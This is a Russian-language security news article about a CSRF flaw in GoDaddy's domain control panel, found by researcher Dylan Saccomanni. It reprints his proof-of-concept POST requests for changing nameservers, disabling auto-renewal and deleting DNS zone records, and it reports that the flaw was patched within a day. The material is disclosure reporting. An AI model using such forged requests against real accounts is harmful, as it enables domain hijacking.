Сервис GoDaddy содержит CSRF-уязвимость [Обновлено]

Сервис GoDaddy содержит CSRF-уязвимость [Обновлено]

Удаленный злоумышленник может получить доступ к доменам, зарегистрированным с помощью данного сервиса.

Исследователь безопасности Дайлан Саккоманни (Dylan Saccomanni) обнаружил CSRF-уязвимость на регистраторе доменных имен GoDaddy, позволяющую удаленному злоумышленнику захватить контроль над любым доменом, зарегистрированным данной компанией. На момент публикации статьи брешь не была исправлена, что ставит под угрозу компрометации владельцев всех доменов, зарегистрированных в GoDaddy.

Специалист отметил, что в GoDaddy отсутствуют какие-либо средства защиты от CSRF-атак. Злоумышленник может изменять серверы имен, настройки автопродления и изменять файлы зоны. Саккоманни пытался связаться с сотрудниками службы безопасности GoDaddy по электронной почте и через соцсети, но ему сообщили, что в ближайшее время выход исправления не предвидится. В связи с этим эксперт решил обнародовать PoC-коды эксплуатации уязвимостей.

Серверы имен

Ниже представлен POST-запрос на сохранение правок для серверов имен:

POST /dcc50/Modals/DomainActions/NSManageWS.asmx/ValidateNameserver HTTP/1.1

Host: dcc.godaddy.com

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:34.0) Gecko/20100101 Firefox/34.0

Accept: application/json, text/javascript, */*; q=0.01

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/json; charset=utf-8

X-Requested-With: XMLHttpRequest

Content-Length: 175

Cookie: [REDACTED]

Connection: keep-alive

Pragma: no-cache

Cache-Control: no-cache

{'request':'{"isall":false,"nsobjs":[{"ns":"foo.example.com","ips": [],"index":0,"add":1,"status":""}, {"ns":"bar.example.com","ips": [],"index":1,"add":1,"status":""}]}'}

Автопродление

Ниже представлен PoC-код, позволяющий отключить функцию автоматического продления:

POST /dcc50/Modals/DomainActions/AutoRenewWS.asmx/Commit HTTP/1.1

Host: dcc.godaddy.com

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:34.0) Gecko/20100101 Firefox/34.0

Accept: application/json, text/javascript, */*; q=0.01

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/json; charset=utf-8

X-Requested-With: XMLHttpRequest

Content-Length: 71

Cookie: [REDACTED]

Connection: keep-alive

Pragma: no-cache

Cache-Control: no-cache

{'request':'{"isAutoRenew":false,"isExtendedAR":false,"extARYears":0}'}

Файл зон DNS

Ниже представлен PoC-код, позволяющий изменить записи DNS в классическом менеджере:

POST /ZoneFile_WS.asmx/SaveRecords HTTP/1.1

Host: dns.godaddy.com

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:34.0) Gecko/20100101 Firefox/34.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/json; charset=utf-8

Content-Length: 922

Cookie: [REDACTED]

Connection: keep-alive

Pragma: no-cache

Cache-Control: no-cache

{"sInput":"< PARAMS >< PARAM name=\"domainName\" value=\"[REDACTED]\" >< PARAM name=\"zoneType\" value=\"0\" >< PARAM name=\"aRecEditCount\" value=\"0\" >< PARAM name=\"aRecDeleteCount\" value=\"0\" >< PARAM name=\"cnameRecEditCount\" value=\"0\" >< PARAM name=\"cnameRecDeleteCount\" value=\"1\" >< PARAM name=\"cnameRecDelete0Index\" value=\"1\" >< PARAM name=\"mxRecEditCount\" value=\"0\" >< PARAM name=\"mxRecDeleteCount\" value=\"0\" >< PARAM name=\"txtRecEditCount\" value=\"0\" >< PARAM name=\"srvRecEditCount\" value=\"0\" >< PARAM name=\"aaaaRecEditCount\" value=\"0\" >< PARAM name=\"soaRecEditCount\" value=\"0\" >< PARAM name=\"nsRecEditCount\" value=\"0\" >< PARAMS >"}

Обновлено: BigDaddy выпустила исправление, устраняющее вышеуказанные уязвимости. Отметим, что бреши были исправлены менее чем за 24 часа после того, как Саккоманни разгласил их детали.

Цифровые следы - ваша слабость, и хакеры это знают.

Подпишитесь и узнайте, как их замести!